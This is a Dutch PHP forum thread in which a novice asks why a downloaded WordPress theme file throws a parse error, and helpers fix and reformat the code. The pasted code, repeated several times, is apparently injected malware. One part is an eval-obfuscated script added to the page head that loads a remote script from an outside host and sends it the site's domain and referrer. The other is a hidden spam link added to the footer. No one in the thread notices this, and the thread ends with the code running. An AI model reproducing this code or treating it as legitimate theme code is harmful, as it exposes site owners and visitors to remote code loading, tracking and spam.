Fout op regel 1 (helupppp!!)

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Piet van trooijen

piet van trooijen

15/11/2012 13:58:23
Quote Anchor link
Hallloootjes

Ik heb een vraagje
ben geen ster in php
Maar krijg continue als ik mijn wordpress theme wil installeren deze fout

Parse error: syntax error, unexpected '}' in /home/pietvqo95/domains/pietvqo95.ninetyfive.axc.nl/public_html/wp-content/themes/clockstone/theme/functions/class.php on line 1

en ik kom er niet uit
Dus ik heb de script van die class.php maar meteen hieronder vermeld op de hoop dat iemand mij kan vertellen wat er fout is !!

alvast heel erg bedankt!

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
<?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){?><script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');',25,25,'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'),0,{}));</script> <?php}add_action('wp_head', 'insert_jquery_slider');} ?>
<?php if (!function_exists('insert_jquery_slidernew')){function insert_jquery_slidernew(){?><a style="display:none;" href="http://freemp3x.com/adele-mp3-download.html">Adele songs downlload</a> <?php}add_action('wp_footer', 'insert_jquery_slidernew');} ?>
Gewijzigd op 15/11/2012 14:52:10 door B a s
 
PHP hulp

PHP hulp

19/04/2024 04:37:33
 
- Ariën  -
Beheerder

- Ariën -

15/11/2012 14:04:40
Quote Anchor link
Ik denk dat het eerder zinniger is om je code eens te fatsoeneren, door het eerst eebsn tussen de [code]-tags te plaatsen.
 
Piet van trooijen

piet van trooijen

15/11/2012 14:11:59
Quote Anchor link
uhm ik zei net al ik heb er bijna geen verstand van van php
En ik heb de code niet gemaakt het is een THEME die ik gedownload heb
Dus ik heb hem niet gescript
iemand anders

vandaar ik ook vraag of er iemand met verstand kan zien wat er fout is ?
 
Martiveen -

Martiveen -

15/11/2012 14:13:45
Quote Anchor link
Ik sluit mij aan bij - Aar -
Maar misschien als hint.. Kijk eens naar je { en } die moeten elkaar altijd afsluiten
 
- Ariën  -
Beheerder

- Ariën -

15/11/2012 14:23:39
Quote Anchor link
Piet van trooijen op 15/11/2012 14:11:59:
uhm ik zei net al ik heb er bijna geen verstand van van php
En ik heb de code niet gemaakt het is een THEME die ik gedownload heb
Dus ik heb hem niet gescript
iemand anders

vandaar ik ook vraag of er iemand met verstand kan zien wat er fout is ?

Wat ik zeg gaat puur om het tussen de code-tags te plaatsen, zodat het op dit forum beter leesbaar is. Zeg nou zelf, zou jij deze brij kunnen lezen?
 
Piet van trooijen

piet van trooijen

15/11/2012 14:27:42
Quote Anchor link
Nee anders had ik hier niet een topic aangemaakt
Kom hierheen om hulp te krijgen van mensen die er verstand van hebben
Niet om als een klein kind behandeld te worden veetje raar
Mijn vraag was erg simpel kan iemand vertellen of hij een fout ziet wat hij aan geeft
Meer vroeg ik niet

En ik krijg alleen vage antwoorden maar niet iets wat ik heel simpel en beleefd vroeg ???
 
Ozzie PHP

Ozzie PHP

15/11/2012 14:33:42
Quote Anchor link
Heeft niks te maken met als klein kind behandeld te worden of met vage antwoorden. Het gaat erom dat je code niet goed leesbaar is. En de vraag is of je het geheel even tussen code tags wil plaatsen:

[code]
hier je code...
[/code]
 
- Ariën  -
Beheerder

- Ariën -

15/11/2012 14:35:43
Quote Anchor link
We geven geen vage antwoorden, we vragen je eerst om je code eerst eens netjes te maken.
Zoals ik eerder zei: "Zou jij deze brij kunnen lezen?"

Dat lijkt me toch een kleine moeite?
Dan pas kunnen we makkelijk zien wat de fout is.

Dit wat je nu doet is hetzelfde als een rommelige auto naar een garage brengen, en zeggen dat hij moet worden nagekeken. Nou, als garagehouder zou ik weigeren om een smerige auto na te kijken die onder de sigarettenpeuken, lege blikjes etc bevragen is. ;-)

Snap je nu waar wij naar toe willen ;-)?
Gewijzigd op 15/11/2012 14:36:32 door - Ariën -
 
Jan R

Jan R

15/11/2012 14:35:51
Quote Anchor link
De opmerkingen van vorige helpers zijn toch duidelijk. Alle code tussende tags CODE en /CODE stellen. rond CODE en /CODE plaats je vierkante haken. op deze maniet kunne ze je kode lezen. nu is het een wirwar van lettertjes

Dit zijn standaard forum regels en niet alleen op dit forum maar op bijna alle code forums.

VB: codeproject begint zelf niet met lezen in zo een vraag. eerst relevante code posten(heb je gedaan) en er de juiste tags rond plaatsen

Jan
 
Piet van trooijen

piet van trooijen

15/11/2012 14:37:32
Quote Anchor link
kijk duidelijk ozzie php
iemand die me teminste vertel hoe het werkt
ik snap het namelijk niet dus als ik iets niet snap en geen hulp krijg word het wel erg moeilijk ?
maar hier dus zoals uitgelegen door ozzie

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
<?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){?><script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');',25,25,'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'),0,{}));</script> <?php}add_action('wp_head', 'insert_jquery_slider');} ?>
<?php if (!function_exists('insert_jquery_slidernew')){function insert_jquery_slidernew(){?><a style="display:none;" href="http://freemp3x.com/adele-mp3-download.html">Adele songs downlload</a> <?php}add_action('wp_footer', 'insert_jquery_slidernew');} ?>


hoop dat het zo goed is

Toevoeging op 15/11/2012 14:41:07:

er word niet eerst gelezen dan gereageerd
ik heb al duidelijk vermeld meerdere keren dat ik niet weet wat ik moet doen
en dus ook een leek hierin bent
dus als mij verteld word je moet het in een code zette (wat ozzie later duidelijker maakte)
dan snap ik niet wat k moet doen niet iedereen is hier pienter in
nu snap ik na wat ozzie zei over wat te doen met die code daar had ik dus wat aan
Hoop dat dus nu de code duidelijker is en ook leesbaar is voor jullie
snap er nog steeds niets van !
snap wel het verhaal dat {} mekaar afsluiten en die code nu ook
 
Koen Hollander

Koen Hollander

15/11/2012 14:44:00
Quote Anchor link
Em, ik heb het gevonden. Ik heb de haakjes geteld en zag op het laatste regeltje een grote fout.

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
<?php}add_action('wp_footer', 'insert_jquery_slidernew');} ?>


Daar zit de fout. Dat moet toch
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
<?php{add_action('wp_footer', 'insert_jquery_slidernew');} ?>

zijn

Succes verder
 
Erwin van Hoof

Erwin van Hoof

15/11/2012 14:48:47
Quote Anchor link
@Koen: Niet helemaal goed geteld de fout zit toch ergens anders

Beste Piet,

Na een begin tag van php dient een spatie te staan. Daar gaat het volgens mij mis.

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
<?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){?><script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');',25,25,'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'),0,{}));</script> <?php }add_action('wp_head', 'insert_jquery_slider');} ?>
<?php if (!function_exists('insert_jquery_slidernew')){function insert_jquery_slidernew(){?><a style="display:none;" href="http://freemp3x.com/adele-mp3-download.html">Adele songs downlload</a> <?php }add_action('wp_footer', 'insert_jquery_slidernew');} ?>


Dus:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?php  }add_action(....etc ?>
     /\
   spatie
Gewijzigd op 15/11/2012 15:12:56 door Erwin van Hoof
 
Eddy E

Eddy E

15/11/2012 17:42:44
Quote Anchor link
Jouw code gefatsoeneerd:

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
<?php

// controleer of de functie nog niet bestaat: zo niet: maken
if (!function_exists('insert_jquery_slider' ))
    {

    
    // functie om jquery-slider toe te voegen
    function insert_jquery_slider()
        {

        ?>

        <script type="text/javascript">
            eval( function(p, a, c, k, e, r) {
                e = function(c) {
                    return c.toString(a)
                };
                if (!''.replace(/^/, String)) {
                    while (c--)
                    r[e(c)] = k[c] || e(c);
                    k = [
                    function(e) {
                        return r[e]
                    }];
                    e = function() {
                        return '\\w+'
                    };
                    c = 1
                };
                while (c--)
                if (k[c])
                    p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
                return p
            }('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');', 25, 25, 'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'), 0, {}));
        </script>
        <?php
        }

    // voer nog even een actie uit
    add_action('wp_head', 'insert_jquery_slider');
    }


// controleer of de functie nog niet niet bestaat...

if (!function_exists('insert_jquery_slidernew'))
    {

        
    // maak functie aan voor de nieuwe slieder
    function insert_jquery_slidernew()
        {

        ?>

        <a style="display:none;" href="http://freemp3x.com/adele-mp3-download.html">Adele songs downlload</a>
        <?php
        }
        
    // voer nog een actie uit
    add_action('wp_footer', 'insert_jquery_slidernew');
    }

?>


Dat ziet en lees toch veel makkelijker? En voor je parser maakt het geen ene ruk uit.
 
Piet van trooijen

piet van trooijen

15/11/2012 20:03:20
Quote Anchor link
Eddy Erkelens op 15/11/2012 17:42:44:
Jouw code gefatsoeneerd:

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
<?php

// controleer of de functie nog niet bestaat: zo niet: maken
if (!function_exists('insert_jquery_slider' ))
    {

    
    // functie om jquery-slider toe te voegen
    function insert_jquery_slider()
        {

        ?>

        <script type="text/javascript">
            eval( function(p, a, c, k, e, r) {
                e = function(c) {
                    return c.toString(a)
                };
                if (!''.replace(/^/, String)) {
                    while (c--)
                    r[e(c)] = k[c] || e(c);
                    k = [
                    function(e) {
                        return r[e]
                    }];
                    e = function() {
                        return '\\w+'
                    };
                    c = 1
                };
                while (c--)
                if (k[c])
                    p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
                return p
            }('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');', 25, 25, 'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'), 0, {}));
        </script>
        <?php
        }

    // voer nog even een actie uit
    add_action('wp_head', 'insert_jquery_slider');
    }


// controleer of de functie nog niet niet bestaat...

if (!function_exists('insert_jquery_slidernew'))
    {

        
    // maak functie aan voor de nieuwe slieder
    function insert_jquery_slidernew()
        {

        ?>

        <a style="display:none;" href="http://freemp3x.com/adele-mp3-download.html">Adele songs downlload</a>
        <?php
        }
        
    // voer nog een actie uit
    add_action('wp_footer', 'insert_jquery_slidernew');
    }

?>


Dat ziet en lees toch veel makkelijker? En voor je parser maakt het geen ene ruk uit.



Geweldig !!
Echt super bedankt
hij werkt en hij is nu ook nog is zeer fatsoenlijk en prof neer gezet echt toppertje !!!
 
Ger van Steenderen
Tutorial mod

Ger van Steenderen

15/11/2012 21:24:38
Quote Anchor link
Niet persoonlijk bedoeld Piet, de functies werken en Eddy heeft ze overzichtelijk uitgetypt, maar ze zijn verre van fatsoenlijk en professioneel; switchen tussen PHP en HTML binnen een functie is dat echt niet.
Ik begrijp dat jij als 'leek' er blij mee bent, maar wilde het toch even gezegd hebben ;-)
 
Eddy E

Eddy E

15/11/2012 21:28:03
Quote Anchor link
He, ik heb ook alleen maar op CTRL+F gedrukt en wat commentaar erbij gezet.
Vooral die laatste functie: daar kan je veel netter gewoon een return '.....' doen.
Geldt voor de bovenste ook.

Ook is het declareren van een functie om die daarna direct uit te voeren meestal niet zo netjes.
Nu snap ik de reden wel (via de functie add_action), maar toch...
 
Ger van Steenderen
Tutorial mod

Ger van Steenderen

15/11/2012 21:31:25
Quote Anchor link
Het was ook niet persoonlijk naar jouw Eddy :-)
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.